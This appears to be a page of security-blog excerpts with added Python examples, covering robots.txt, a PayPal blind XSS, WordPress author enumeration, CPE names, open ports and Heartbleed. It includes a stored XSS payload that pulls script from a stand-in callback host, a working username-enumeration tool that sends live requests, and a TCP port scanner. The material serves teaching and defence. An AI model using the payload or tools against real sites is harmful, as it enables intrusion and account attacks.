How to Block Automated Scanners from Scanning your Site

This blog post describes how to block automated scanners from scanning your website. It works with any web scanner that honours robots.txt, which the popular ones do. Website owners use the robots.txt file to give instructions about their site to web robots, such as Google’s indexing bot. The /robots.txt file is a text file, with one or more records, […]
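How a robots.txt-honouring crawler or scanner decides whether it may request a URL, as an added example (not code from the original post or from Acunetix). It uses the standard-library parser, a constructed robots.txt, and a hypothetical scanner name "ExampleScanner":

```python
"""Decide whether a user-agent may fetch a URL according to robots.txt.

This is the check a well-behaved crawler or scanner performs before
requesting a page. The robots.txt content is constructed for this example
and the user-agent "ExampleScanner" is hypothetical.
"""
from urllib.robotparser import RobotFileParser

SAMPLE_ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/

User-agent: ExampleScanner
Disallow: /
"""


def load_robots(robots_text: str) -> RobotFileParser:
    """Parse robots.txt text that has already been fetched from /robots.txt."""
    parser = RobotFileParser()
    parser.parse(robots_text.splitlines())
    return parser


def can_fetch(robots_text: str, user_agent: str, url: str) -> bool:
    """True if the rules allow `user_agent` to request `url`.

    Matching follows the robots.txt convention: the first record whose
    User-agent value is a case-insensitive substring of `user_agent`
    applies; if none does, the "*" record applies.
    """
    return load_robots(robots_text).can_fetch(user_agent, url)


def blocked_urls(robots_text: str, user_agent: str, urls) -> list:
    """Return the subset of `urls` that the rules forbid for `user_agent`."""
    parser = load_robots(robots_text)
    return [u for u in urls if not parser.can_fetch(user_agent, u)]
```

The caveat a practitioner wants: robots.txt is advisory. A scanner run by someone hostile simply ignores it, so the "Disallow: /" record keeps honest tools off a site (and out of search results) but is not an access control; authentication, IP allow-listing or rate limiting are what actually stop unwanted scanning.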


AcuMonitor could have Detected PayPal’s Blind XSS Vulnerability

Vulnerability-Lab, a Germany-based security research company, recently identified an application-side validation web vulnerability which allows an attacker to inject code into their own user profile. The injected code executes when a PayPal employee loads the user’s details in PayPal’s backend system. This type of vulnerability is better known as a Blind Cross-Site Scripting (Blind XSS) vulnerability […]
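The pattern behind a blind XSS like this one, shown as an added example (not the payload or code from the Vulnerability-Lab report, and not PayPal's code): a profile field is stored by the public site and later rendered, unescaped, in a back-office page that a different, more privileged user views. The profile value, the callback host and the template fragments are constructed:

```python
"""Stored profile value rendered in a back-office page: vulnerable vs fixed.

Constructed example. The callback URL is a placeholder for a host the
attacker watches; with a blind XSS the attacker never sees the page, so a
callback is the only signal that the payload ran somewhere.
"""
import html

# Attacker-controlled value, accepted by the public profile form.
PROFILE_NAME = '<script src="https://callback.example/p.js"></script>'


def render_profile_row_vulnerable(display_name: str) -> str:
    """Back-office template that interpolates the stored value as-is."""
    return f"<tr><td>Name</td><td>{display_name}</td></tr>"


def render_profile_row_fixed(display_name: str) -> str:
    """Same template with output encoding for an HTML text context.

    Encoding at output time is what protects the backend viewer; input
    validation on the public form does not help once the raw value is in
    the database and another application renders it.
    """
    return f"<tr><td>Name</td><td>{html.escape(display_name, quote=True)}</td></tr>"
```

The fixed variant emits `&lt;script ...&gt;` as visible text instead of an element the employee's browser would execute.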


WordPress Username Enumeration using HTTP Fuzzer

In many WordPress blogs, it’s possible to enumerate WordPress users using a well-known feature/bug related to author archives. This works if the following conditions are met: WordPress permalinks are enabled. By default WordPress uses web URLs which have question marks and lots of numbers in them; however, WordPress offers the ability to create a custom URL structure for your […]
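The enumeration itself, as an added example rather than the HTTP Fuzzer steps from the original post. It assumes the author-archive behaviour that applies when custom permalinks are on: a request for `/?author=N` answers with a 301 redirect to `/author/<username>/`. The responses below are constructed; `fetch_with_http_client` performs a real request (without following redirects) against a target you are authorised to test:

```python
"""Harvest WordPress usernames from ?author=N redirects (added example)."""
import http.client
import re
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import urlparse

AUTHOR_PATH = re.compile(r"^/author/([^/]+)/?$")
Response = Tuple[int, Dict[str, str]]  # (status code, response headers)


def username_from_location(location: str) -> Optional[str]:
    """Pull the author slug out of a Location header, or None."""
    if not location:
        return None
    match = AUTHOR_PATH.match(urlparse(location).path)
    return match.group(1) if match else None


def enumerate_authors(fetch: Callable[[str], Response], base_url: str,
                      max_id: int = 10) -> Dict[int, str]:
    """Try author IDs 1..max_id and map each ID that redirects to its username."""
    found: Dict[int, str] = {}
    for author_id in range(1, max_id + 1):
        status, headers = fetch(f"{base_url}/?author={author_id}")
        if status not in (301, 302):
            continue
        location = next((v for k, v in headers.items() if k.lower() == "location"), "")
        name = username_from_location(location)
        if name:
            found[author_id] = name
    return found


def fetch_with_http_client(url: str, timeout: float = 5.0) -> Response:
    """Real GET that does not follow redirects, so the Location header is visible."""
    parts = urlparse(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    try:
        path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
        conn.request("GET", path, headers={"User-Agent": "author-enum-example"})
        resp = conn.getresponse()
        return resp.status, dict(resp.getheaders())
    finally:
        conn.close()


# Constructed responses: a blog with permalinks enabled and two authors.
FAKE_RESPONSES = {
    "https://blog.example/?author=1": (301, {"Location": "https://blog.example/author/admin/"}),
    "https://blog.example/?author=2": (301, {"Location": "https://blog.example/author/jdoe/"}),
}


def fake_fetch(url: str) -> Response:
    """Offline stand-in for fetch_with_http_client."""
    return FAKE_RESPONSES.get(url, (404, {}))
```

Usage against a live site is `enumerate_authors(fetch_with_http_client, "https://blog.example", 20)`. On the defensive side, the same function is a quick regression check after you have configured the site to answer `?author=N` without the redirect.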


Common Platform Enumeration (CPE) Explained

When running a Network Scan on your perimeter server using Acunetix Online Vulnerability Scanner (OVS), one of the Informational alerts shown in the scan results is the CPE Inventory. The data that is collected during the scan is aggregated using the CPE standard, originally defined by MITRE, and is maintained by the U.S. National Institute […]
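What a CPE name actually encodes, shown with an added parser (not Acunetix code). It accepts both syntaxes the standard defines, the CPE 2.2 URI form (`cpe:/a:vendor:product:version...`) and the CPE 2.3 formatted string (`cpe:2.3:a:vendor:product:version:...:other`), and implements the simple matching case where `*` (ANY) in a pattern matches any value and every other attribute must be equal; wildcards inside an attribute value are not handled. Sample names are constructed:

```python
"""Parse CPE 2.2 URIs and CPE 2.3 formatted strings; match inventory to patterns."""
import re
from typing import Dict

ATTRIBUTES = ["part", "vendor", "product", "version", "update", "edition",
              "language", "sw_edition", "target_sw", "target_hw", "other"]

# In a 2.3 formatted string a literal colon inside a value is escaped as "\:".
_UNESCAPED_COLON = re.compile(r"(?<!\\):")


def parse_cpe(name: str) -> Dict[str, str]:
    """Return the eleven CPE attributes; components a 2.2 URI omits become ANY ("*")."""
    if name.startswith("cpe:2.3:"):
        values = _UNESCAPED_COLON.split(name[len("cpe:2.3:"):])
        if len(values) != len(ATTRIBUTES):
            raise ValueError(f"CPE 2.3 string needs 11 components: {name}")
    elif name.startswith("cpe:/"):
        values = name[len("cpe:/"):].split(":")
        if not 1 <= len(values) <= 7:
            raise ValueError(f"CPE 2.2 URI has 1 to 7 components: {name}")
        values = [v if v else "*" for v in values]          # empty component == ANY
        values += ["*"] * (len(ATTRIBUTES) - len(values))   # trailing components == ANY
    else:
        raise ValueError(f"not a CPE name: {name}")
    return dict(zip(ATTRIBUTES, values))


def cpe_matches(inventory_name: str, pattern_name: str) -> bool:
    """True if each attribute of the pattern is ANY or equals the inventory value."""
    inv = parse_cpe(inventory_name)
    pat = parse_cpe(pattern_name)
    for attr in ATTRIBUTES:
        if pat[attr] == "*":
            continue
        if inv[attr].lower() != pat[attr].lower():
            return False
    return True
```

This is the operation behind a CPE inventory: the scanner records one name per detected product, and an advisory's CPE pattern (usually with the version left as ANY or pinned to an affected release) is matched against each inventory entry to decide which hosts are in scope.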


Cookie Overdose

One of our customers recently reported that some parts of his site were not properly crawled by our scanner (Acunetix Web Vulnerability Scanner). Upon investigation, I found the cause of the problem. When a specific page was visited, a cookie with a random name and a large value was set. This page had many parameters and the crawler had […]


Network Vulnerability Assessment Gotchas to Avoid

There’s a saying that experience is something you don’t get until just after you need it. It’s so true, especially in the context of information security and, specifically, network security testing. If you have any experience running vulnerability scans, you’ve no doubt been down that road with me. You know, the one where you scan […]


How to Close Unused Open Ports

One of the checks done in a network scan by Acunetix Online Vulnerability Scanner (OVS) is a TCP and UDP port scan. Any open ports detected during the scan will be reported as shown in the screenshot. In this particular scan, these ports have been detected as being open on the server: 80, 1027, 135, […]
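How the open-port check is made and how to turn its output into a to-do list, as an added example (not the Acunetix OVS scanner). It does a full TCP connect per port, which is what a scanner without raw-socket privileges does, and compares the result with an allow-list you maintain. It assumes you are permitted to scan the host; the self-test binds a listener on loopback so it runs offline:

```python
"""TCP connect scan plus allow-list comparison (added example)."""
import socket
from typing import Dict, Iterable, List, Tuple


def tcp_port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """True when the three-way handshake completes; False on refusal or timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return True
        except OSError:  # ConnectionRefusedError and timeouts both derive from OSError
            return False


def scan_tcp(host: str, ports: Iterable[int], timeout: float = 0.5) -> Dict[int, bool]:
    """Map each port to whether it accepted a connection."""
    return {port: tcp_port_open(host, port, timeout) for port in ports}


def unexpected_ports(open_ports: Iterable[int], allowed: Iterable[int]) -> List[int]:
    """Open ports not on the allow-list: the services to stop, or to firewall."""
    return sorted(set(open_ports) - set(allowed))


def selftest_loopback() -> Tuple[bool, bool]:
    """Scan one listening loopback port and one that was just released."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()
    try:
        return (tcp_port_open("127.0.0.1", open_port),
                tcp_port_open("127.0.0.1", closed_port))
    finally:
        listener.close()


if __name__ == "__main__":
    # The three ports the post lists as open on the scanned server; only 80 is wanted.
    result = scan_tcp("127.0.0.1", [80, 135, 1027])
    print(unexpected_ports([p for p, is_open in result.items() if is_open], [80]))
```

For each port this reports, find the owning process (`ss -tulpn` on Linux, `netstat -ano` on Windows) and prefer disabling the service over filtering it: a firewall rule hides the listener from the scanner but leaves the code running. UDP needs a different probe, since a silent UDP port is indistinguishable from a filtered one with this method.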


Heartbleed – A Bigger Threat Than Meets the Eye

The Heartbleed Bug took the world by storm the moment the vulnerability became public. Heartbleed is a serious vulnerability in the widely used OpenSSL cryptographic library. It lets an unauthenticated client read data resident in the server’s memory: the plaintext of traffic that SSL/TLS was meant to protect, session data, and potentially the server’s SSL private keys. According to Netcraft’s April 2014 […]
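Why a heartbeat message can read memory, as an added example that models the defective and the corrected length handling in Python (this is not OpenSSL's code and not an exploit against a real server). A heartbeat message is type (1 byte), payload length (2 bytes), payload, then at least 16 bytes of padding. The vulnerable handler trusted the peer-supplied payload length and copied that many bytes from the record buffer; the OpenSSL 1.0.1g fix first checks that length against the actual record length and silently drops the message if it does not fit. The "memory" here is a constructed byte string:

```python
"""Vulnerable vs fixed heartbeat handling, simulated over a byte buffer."""
import struct
from typing import Optional

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16  # minimum padding a heartbeat message carries


def build_heartbeat(payload: bytes, claimed_len: int) -> bytes:
    """type(1) | payload_length(2) | payload | padding. `claimed_len` may lie."""
    return bytes([HB_REQUEST]) + struct.pack("!H", claimed_len) + payload + b"\x00" * PADDING


def heartbeat_vulnerable(memory: bytes, record_len: int) -> Optional[bytes]:
    """Pre-1.0.1g logic: the peer's payload_length is never checked against record_len."""
    hbtype = memory[0]
    (payload_len,) = struct.unpack("!H", memory[1:3])
    if hbtype != HB_REQUEST:
        return None
    echoed = memory[3:3 + payload_len]  # runs past the record into adjacent memory
    return bytes([HB_RESPONSE]) + struct.pack("!H", payload_len) + echoed + b"\x00" * PADDING


def heartbeat_fixed(memory: bytes, record_len: int) -> Optional[bytes]:
    """1.0.1g logic: discard any message whose claimed length exceeds the record."""
    if record_len < 1 + 2 + PADDING:
        return None
    hbtype = memory[0]
    (payload_len,) = struct.unpack("!H", memory[1:3])
    if hbtype != HB_REQUEST:
        return None
    if 1 + 2 + payload_len + PADDING > record_len:
        return None  # silently discard, as the patch does
    echoed = memory[3:3 + payload_len]
    return bytes([HB_RESPONSE]) + struct.pack("!H", payload_len) + echoed + b"\x00" * PADDING


# Constructed: a 4-byte payload with a claimed length of 64, and stand-in bytes
# for whatever happened to sit after the record in the server's memory.
MALICIOUS = build_heartbeat(b"ping", 64)
ADJACENT = b"session=abc123; -----BEGIN RSA PRIVATE KEY----- ..."
MEMORY = MALICIOUS + ADJACENT
RECORD_LEN = len(MALICIOUS)
HONEST = build_heartbeat(b"ping", 4)
```

In the simulation the vulnerable handler's reply carries the adjacent bytes; the real bug allowed up to 64 KB per request, repeatable without limit and without a trace in the server logs, which is why the advice was to patch, reissue certificates and rotate session secrets rather than patch alone.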
